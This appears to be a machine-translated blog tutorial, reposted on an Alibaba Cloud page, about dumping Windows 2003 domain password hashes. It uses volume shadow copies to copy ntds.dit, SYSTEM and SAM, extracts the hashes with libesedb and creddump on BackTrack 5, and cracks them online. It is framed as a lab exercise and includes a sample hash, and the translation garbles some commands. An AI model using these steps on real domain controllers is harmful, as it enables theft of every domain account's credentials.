Home > Others

Offline broken win2003 domain account password

Source: Internet
Author: User
Tags domain server
Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more >

offline broken win2003 domain account password

Many methods are spoken in the domestic website. To share with you the experience of my experimental success.

This is done by following the Tim 's article, which is linked as follows:

Http://pauldotcom.com/2011/11/safely-dumping-hashes-from-liv.html

a experimental environment:windows server2003, domain environment

Construction method is very simple, Baidu search search.

Preparation Tool: Vssown.vbs,bt5,ntds_dump_hash.zip

Vssown.vbs Online Search

Http://www.ntdsxtract.com/downloads/ntds_dump_hash.zip

http://ftp.halifax.rwth-aachen.de/backtrack/BT5R1-GNOME-VM-32.7z

Create a new domain user Xiaocaiwith the password set to 123abcabc

two win2003 under Extract Files

1, copy the Vssown.vbs to the domain server, such as copy to the desktop of the domain server.

2. Run cmd as Administrator and perform the following name:

CD Desktop

cscript//nologo vssown.vbs/start enabled

cscript//nologo vssown.vbs/status view run status

cscript//nologo vssown.vbs/create C Create a snapshot

cscript//nologo vssown.vbs/list View the snapshot information created

Here you can see the path inside the system, copying two Ntds.dit and system files to the desktop, where [X] is replaced with 5 .

Copy \\?\globalroot\device\harddiskvolumeshadowcopy[x]\windows\ntds\ntds.dit

Copy \\?\globalroot\device\harddiskvolumeshadowcopy[x]\windows\system32\config\system

Copy \\?\globalroot\device\harddiskvolumeshadowcopy[x]\windows\system32\config\sam

The extraction will be over on the file. There are often failures when trying here. There is no time to find information on what is the cause.

Delete the snapshot (this step is optional, it is recommended to delete)

cscript//nologo Vssown.vbs/delete {b3475a72-86d2-48ec-a22f-6e8dbb82903d}

Copy the 3 generated files.

three Extract HASH

Download the tool first, BT5, I'm using this virtual machine mirror phase

VMware Mirror 32-bit: http://ftp.halifax.rwth-aachen.de/backtrack/BT5R1-GNOME-VM-32.7z

Default login Password: Root/toor

Open SSH Service: (can be accessed with Se Cure CRT after opening service , convenient for file transfer)

Ssh-keygen-t rsa-f/etc/ssh/ssh_host_rsa_key

Ssh-keygen-t dsa-f/etc/ssh/ssh_host_dsa_key

Sshd-generate

/etc/init.d/ssh restart

A little off.

View IP with ifconfig

then use SeCure CRT access,

Press Alt+p open sftp and upload the file to/tmp

Cd/tmp

Put SYSTEM Ntds.dit Ntds_dump_hash.zip

Switch to BT5 System Label

CD/ tmp

Ls

# Unzip Ntds_dump_hash.zip

Unzip Ntds_dump_hash.zip

# Compile Libesedb

CD Libesedb

chmod +x Configure

./configure && Make

# Interpreting data Files Ntds.dit

CD Esedbtools

./esedbdumphash. /.. /ntds.dit

# Extract Hash

Cd.. /.. /creddump/

Python./dsdump.py. /system. /libesedb/esedbtools/ntds.dit.export/datatable

Extracted, found,

xiaocai:1109:8a79528ccd6e0dbffcd6b8db0f458c37:3b0de00581a39a49946206e0998b7df7:::

Four Crack Hash

crack Hash method A lot, here use website crack. Put the bold part on the website. Crack:http://www.objectif-securite.ch/en/ophcrack.php

 

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

Related Keywords:
mac mail account offline mail account offline mac best offline password vault thunderbird account password thunderbird change account password usajobs account password reset root account password mysql

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

What's Trending
Top 10 Tags
datastax versions naming convention zookeeper client class definition md5 microsoft sql server 2005 data structures exception handling error handling
Top 10 Keywords
microsoft download center down wordpress address url site address url wordpress address url windows installer 4 0 download 302 not found web address url definition site address url wordpress db2 integer mac os installation step by step pdf abbreviation for return

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

  • Sales Support

    1 on 1 presale consultation

    Chat Contact Sales

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    Open a Ticket

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

    Learn More